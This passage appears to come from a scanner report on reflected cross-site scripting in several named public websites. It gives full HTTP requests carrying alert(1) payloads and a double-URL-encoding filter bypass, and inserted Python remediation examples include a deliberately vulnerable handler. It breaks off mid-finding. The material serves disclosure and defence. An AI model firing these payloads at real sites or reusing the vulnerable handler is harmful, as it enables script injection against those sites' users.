This behaviour demonstrates that it is possible to close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Note that the reflection point (see the response below) is inside an <!--!esi:include src="..."--> directive, which the OracleAS Web Cache in front of the application processes server-side, so manual testing should also consider whether the parameter name reaches the ESI parser rather than only the browser.
Request
GET /DRHM/store?Action=DisplayProductInterstitialDetailsPage&SiteID=winamp&Locale=en_US&ThemeID=1279300&productID=103591500&94384-->4321560c01e=1 HTTP/1.1 Host: shop.winamp.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; s_pers=%20s_getnr%3D1298828673274-New%7C1361900673274%3B%20s_nrgvo%3DNew%7C1361900673275%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/buy%252526ot%25253DA%3B; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Connection: Keep-Alive Keep-Alive: timeout=45, max=999 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=67280341872,0) Date: Sun, 27 Feb 2011 17:47:17 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 14076
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?94384-->4321560c01e=1&Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911800&StyleVersion=3&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ProductInterstitialDetailsPage ...[SNIP]...
3.49. https://shop.winamp.com/store [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: https://shop.winamp.com
Path: /store
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 741fc-->4ffb80c87d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. As in the previous finding, the reflection point is an ESI include directive.
Request
GET /store?Action=DisplayPage&Locale=en_US&SiteID=winamp&id=QuickBuyCartPage&741fc-->4ffb80c87d5=1 HTTP/1.1 Host: shop.winamp.com Connection: keep-alive Referer: http://forums.winamp.com/login.php?do=login Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; s_pers=%20s_getnr%3D1298828673274-New%7C1361900673274%3B%20s_nrgvo%3DNew%7C1361900673275%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/buy%252526ot%25253DA%3B; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Connection: Keep-Alive Keep-Alive: timeout=45, max=999 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=114525015766,0) Date: Sun, 27 Feb 2011 17:47:47 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 101351
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?741fc-->4ffb80c87d5=1&Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=QuickBuyCartPage"--> ...[SNIP]...
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 12603<script>alert(1)</script>368df4f71e6 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /buttons/count?url=http%3A//techcrunch.com/classics/12603<script>alert(1)</script>368df4f71e6 HTTP/1.1 Host: widgets.digg.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/classics/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the gclid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 887e2"><script>alert(1)</script>3846485b49a was submitted in the gclid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearch&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw887e2"><script>alert(1)</script>3846485b49a HTTP/1.1 Host: www.business-software.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31949"><script>alert(1)</script>6472702855d was submitted in the keyword parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearch&keyword=content%20management%20system31949"><script>alert(1)</script>6472702855d&gclid=CNHU87X6pqcCFVln5QodaVjCBw HTTP/1.1 Host: www.business-software.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equiv="C ...[SNIP]... <form method="post" id="RegistrationQForm" action="/top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearch&keyword=content%20management%20system31949"><script>alert(1)</script>6472702855d&gclid=CNHU87X6pqcCFVln5QodaVjCBw"> ...[SNIP]...
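The form action in the response above is the raw request URI pasted into a double-quoted attribute, which is why every query parameter on this page, and any arbitrary parameter name, is a reflection point. As an added example, not business-software.com's PHP, here is the same form action rebuilt in Python from the request path plus an allow-list of the four parameters the page actually uses, with each value URL-encoded and the result HTML-encoded for the attribute; the allow-list and the tag layout are assumptions taken from the captured request and response.

```python
import html
from urllib.parse import parse_qs, urlencode, urlsplit

# Parameters the page legitimately carries forward into its own form action
# (assumed from the captured request). Anything else in the query string,
# including an arbitrarily named parameter, is dropped rather than echoed.
ALLOWED = ("track", "traffic", "keyword", "gclid")


def form_action(request_uri: str) -> str:
    """Rebuild the form action from the request path and the allow-listed query
    parameters. urlencode() handles the URL layer (no raw quotes or angle
    brackets survive), html.escape() handles the attribute layer (& becomes &amp;)."""
    parts = urlsplit(request_uri)
    qs = parse_qs(parts.query, keep_blank_values=True)
    kept = [(k, v) for k in ALLOWED for v in qs.get(k, [])]
    rebuilt = parts.path + ("?" + urlencode(kept) if kept else "")
    return html.escape(rebuilt, quote=True)


def form_tag(request_uri: str) -> str:
    """The opening tag from the report's response, with the safe action."""
    return f'<form method="post" id="RegistrationQForm" action="{form_action(request_uri)}">'


if __name__ == "__main__":
    # Constructed inputs modelled on the report's requests.
    for uri in (
        '/top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearch'
        '&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw'
        '&e4664"><script>alert(1)</script>215d5cf1a41=1',
        '/top-10-web-content-management-vendors.php?track=12158831c"><script>alert(1)</script>0aa3cd70274'
        '&traffic=GoogleSearch&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw',
    ):
        print(form_tag(uri))
```

Encoding alone (html.escape on the raw URI) would also have stopped these PoCs, but rebuilding from an allow-list additionally removes the arbitrary-parameter-name vector and keeps unknown tracking parameters from being replayed into the POST.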
3.53. http://www.business-software.com/top-10-web-content-management-vendors.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.business-software.com
Path: /top-10-web-content-management-vendors.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4664"><script>alert(1)</script>215d5cf1a41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearch&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw&e4664"><script>alert(1)</script>215d5cf1a41=1 HTTP/1.1 Host: www.business-software.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the track request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8831c"><script>alert(1)</script>0aa3cd70274 was submitted in the track parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top-10-web-content-management-vendors.php?track=12158831c"><script>alert(1)</script>0aa3cd70274&traffic=GoogleSearch&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw HTTP/1.1 Host: www.business-software.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the traffic request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c411b"><script>alert(1)</script>5975ff9a4a8 was submitted in the traffic parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearchc411b"><script>alert(1)</script>5975ff9a4a8&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw HTTP/1.1 Host: www.business-software.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload bf915<img%20src%3da%20onerror%3dalert(1)>77ba82f09ef was submitted in the url parameter. This input was echoed as bf915<img src=a onerror=alert(1)>77ba82f09ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /cws/share-count?url=http%3A%2F%2Fwww.project-syndicate.org%2Fcommentary%2Fashour1%2FEnglishbf915<img%20src%3da%20onerror%3dalert(1)>77ba82f09ef HTTP/1.1 Host: www.linkedin.com Proxy-Connection: keep-alive Referer: http://www.project-syndicate.org/commentary/ashour1/English Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID="ajax:1083319264699442203"; Version=1; Path=/ P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Set-Cookie: leo_auth_token="GST:8qHmbJnGz3ALaeEKNDhv6Mnph3zq5ejKEjY-bzJWaTAdnP_K27P2mp:1298773233:7ca8bc841c7b778fb2296ec1656d588ca5376bc7"; Version=1; Max-Age=1799; Expires=Sun, 27-Feb-2011 02:50:32 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: visit=G; Expires=Fri, 17-Mar-2079 05:34:40 GMT; Path=/ Set-Cookie: bcookie="v=1&b9beeacf-d5b5-4c7b-8122-9094af2abc48"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Fri, 17-Mar-2079 05:34:40 GMT; Path=/ Vary: Accept-Encoding Content-Type: text/javascript;charset=UTF-8 Content-Language: en-US Date: Sun, 27 Feb 2011 02:20:33 GMT Content-Length: 151
The value of the bean request parameter is copied into the HTML document as plain text between tags. The payload 7e534<img%20src%3da%20onerror%3dalert(1)>39d24d73cff was submitted in the bean parameter. This input was echoed as 7e534<img src=a onerror=alert(1)>39d24d73cff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
<!-- ADF Lightbox Framework Loaded @ {ts '2011-02-26 18:16:29'} --> <script type='text/javascript' s ...[SNIP]... </script> The Bean: twitterService7e534<img src=a onerror=alert(1)>39d24d73cff with method: buildUtilityTweetHTML is not accessible remotely via Ajax Proxy.
The value of the method request parameter is copied into the HTML document as plain text between tags. The payload 998c7<img%20src%3da%20onerror%3dalert(1)>36e6591e379 was submitted in the method parameter. This input was echoed as 998c7<img src=a onerror=alert(1)>36e6591e379 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
<!-- ADF Lightbox Framework Loaded @ {ts '2011-02-26 18:16:36'} --> <script type='text/javascript' s ...[SNIP]... </script> The Bean: twitterService with method: buildUtilityTweetHTML998c7<img src=a onerror=alert(1)>36e6591e379 is not accessible remotely via Ajax Proxy.
3.59. http://www.prchecker.info/check_page_rank.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.prchecker.info
Path:
/check_page_rank.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27f50"><script>alert(1)</script>1c5367c1276627aae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /check_page_rank.php/27f50"><script>alert(1)</script>1c5367c1276627aae?action=docheck&urlo=http%3A%2F%2Fcloudscan.us&submit=Check+PR HTTP/1.1 Host: www.prchecker.info Proxy-Connection: keep-alive Referer: http://www.prchecker.info/check_page_rank.php Cache-Control: max-age=0 Origin: http://www.prchecker.info Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=d8830cccd52d81fdcc1aa4a449836fbd
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 01:34:46 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 27444
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us"> <html> <title> ...[SNIP]... <form action="/check_page_rank.php/27f50"><script>alert(1)</script>1c5367c1276627aae" method="post"> ...[SNIP]...
The value of the urlo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82917"%20style%3dx%3aexpression(alert(1))%20363f71d7529b64269 was submitted in the urlo parameter. This input was echoed as 82917\" style=x:expression(alert(1)) 363f71d7529b64269 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. The backslash that the application inserts before the quotation mark (addslashes-style escaping) has no meaning inside an HTML attribute, so the quote still terminates the attribute value and the injected style attribute is parsed. Note that CSS expression() is evaluated only by legacy versions of Internet Explorer and is ignored by other browsers; the attribute breakout itself is browser-independent.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /check_page_rank.php?action=docheck&urlo=http%3A%2F%2Fcloudscan.us82917"%20style%3dx%3aexpression(alert(1))%20363f71d7529b64269&submit=Check+PR HTTP/1.1 Host: www.prchecker.info Proxy-Connection: keep-alive Referer: http://www.prchecker.info/check_page_rank.php Cache-Control: max-age=0 Origin: http://www.prchecker.info Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=d8830cccd52d81fdcc1aa4a449836fbd
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 01:34:45 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 27543
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8e9b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1374672bac was submitted in the REST URL parameter 3. This input was echoed as c8e9b</script><script>alert(1)</script>a1374672bac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /Portfolio/Trades-and-Exhibits/id-24c8e9b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1374672bac/page-1/ HTTP/1.1 Host: www.sti-cs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298757236.2; __utmc=249072581; __utmb=249072581.1.10.1298757236;
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:18:55 GMT Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.13 Connection: close Content-Type: text/html Content-Length: 14545
...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Trades and Exhibits :: STI - Creative Services</title>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98f92%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4b72cc82878 was submitted in the REST URL parameter 3. This input was echoed as 98f92</script><script>alert(1)</script>4b72cc82878 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /Portfolio/Trades-and-Exhibits/id-2598f92%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4b72cc82878/page-1/ HTTP/1.1 Host: www.sti-cs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298757236.2; __utmc=249072581; __utmb=249072581.1.10.1298757236;
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:19:02 GMT Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.13 Connection: close Content-Type: text/html Content-Length: 14545
...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Trades and Exhibits :: STI - Creative Services</title>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e625%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7ccd8e3bb1d was submitted in the REST URL parameter 3. This input was echoed as 4e625</script><script>alert(1)</script>7ccd8e3bb1d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /Portfolio/Trades-and-Exhibits/id-74e625%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7ccd8e3bb1d/page-1/ HTTP/1.1 Host: www.sti-cs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298757236.2; __utmc=249072581; __utmb=249072581.1.10.1298757236;
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:18:51 GMT Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.13 Connection: close Content-Type: text/html Content-Length: 14544
...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Trades and Exhibits :: STI - Creative Services</title>
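The three sti-cs.com findings above rely on the same double-URL-encoding bypass: the filter runs after the first decode and never sees a `<`, and the application decodes a second time before reflecting the value. The Python below is an added editorial example, not code from the scanned site or from the scanner. It models a hypothetical handler with that decode-filter-decode sequence, shows why the single-encoded payload is caught while the double-encoded one reaches the inline script, and contrasts it with a handler that canonicalizes the value first, allow-lists it, and still encodes on output. The handler names, the id allow-list and the `var id` template are assumptions.

```python
import json
import re
from urllib.parse import unquote

# Constructed: the double-encoded payload shape from the report. After one
# decode it contains only %3c / %3e sequences, which a character blacklist
# does not recognise; a second decode turns them into real < and > characters.
DOUBLE_ENCODED = ("c8e9b%253c%252fscript%253e%253cscript%253ealert%25281%2529"
                  "%253c%252fscript%253ea1374672bac")
SINGLE_ENCODED = "c8e9b%3cscript%3ealert%281%29%3c%2fscript%3ea1374672bac"

BLOCKED_CHARS = set('<>"\'')


def blacklist_filter(value: str) -> str:
    """The kind of filter the report describes: strip characters often used in XSS."""
    return "".join(ch for ch in value if ch not in BLOCKED_CHARS)


def vulnerable_handler(raw_segment: str) -> str:
    """Hypothetical handler that reproduces the bypass.

    The web server decodes the path once, the filter runs on that result,
    and the application decodes the value a second time before reflecting
    it into a single-quoted JavaScript string.
    """
    once = unquote(raw_segment)            # %253c -> %3c  (filter cannot see '<' yet)
    filtered = blacklist_filter(once)      # nothing blocked, value passes unchanged
    value = unquote(filtered)              # %3c -> <      (too late to filter now)
    return "var id = '%s';" % value


def canonicalize(raw_segment: str, max_rounds: int = 3) -> str:
    """Decode until the value is stable, so validation sees the final form.

    Bounded so that a value with many nested encodings is rejected rather
    than decoded indefinitely.
    """
    value = raw_segment
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("value still changes after %d decode rounds" % max_rounds)


def hardened_handler(raw_segment: str) -> str:
    """Canonicalize first, then allow-list, then encode on output."""
    value = canonicalize(raw_segment)
    # Allow-list (assumed): a portfolio id only needs letters, digits, '-' and '_'.
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", value):
        raise ValueError("rejected id: %r" % value)
    # Output encoding as a second layer: json.dumps yields a valid JS string
    # literal, and escaping '<' keeps it from ever closing a <script> element.
    literal = json.dumps(value).replace("<", "\\u003c")
    return "var id = %s;" % literal


def hardened_rejects(raw_segment: str) -> bool:
    """True when the hardened handler refuses the input."""
    try:
        hardened_handler(raw_segment)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(vulnerable_handler(SINGLE_ENCODED))   # filter catches the single-encoded form
    print(vulnerable_handler(DOUBLE_ENCODED))   # double-encoded form reaches the script
    print(hardened_rejects(DOUBLE_ENCODED), hardened_handler("id-24"))
```

The point of `canonicalize` is that validation must run on the same representation the application finally uses; the allow-list then makes the blacklist unnecessary, and the output encoding covers any path that bypasses both.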
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 291e9'-alert(1)-'67bdd5c1b7a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
